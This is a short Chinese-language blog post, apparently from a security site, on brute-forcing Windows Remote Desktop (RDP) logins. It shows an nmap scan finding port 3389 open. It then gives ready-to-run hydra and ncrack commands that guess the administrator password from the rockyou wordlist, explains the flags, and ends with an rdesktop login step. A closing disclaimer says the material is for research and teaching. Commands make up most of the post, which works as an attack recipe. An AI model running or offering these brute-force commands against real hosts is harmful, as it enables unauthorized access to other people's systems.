RDP是远程桌面协议。
$ nmap your_target Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-20 17:29 CST Nmap scan report for ns514636.ip-192-95-xx.net (192.95.xx.xx) Host is up (0.28s latency). Not shown: 988 closed ports PORT STATE SERVICE 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 445/tcp filtered microsoft-ds 593/tcp filtered http-rpc-epmap 3389/tcp open ms-wbt-server # 这个是远程桌面端口 4444/tcp filtered krb524 6667/tcp filtered irc 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49163/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 28.14 seconds
使用hydra暴力破解:
hydra -t 4 -V -l administrator -P /usr/share/wordlists/rockyou.txt rdp://your_target
-t = TASKS run TASKS number of connects in parallel (per host, default: 16) RDP set to maximum of 4. -V = Verbose shows you the attempted passwords. -l = Username -P = Password list rdp:// = Port 3389
使用ncrack暴力破解:
ncrack -p 3389 -v -user administrator -P /usr/share/wordlists/rockyou.txt 192.95.xx.xx
-p = Port number -v = Verbose shows you any found passwords in realtime -user = username -P = Password list
远程桌面登录:
rdesktop your_target
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论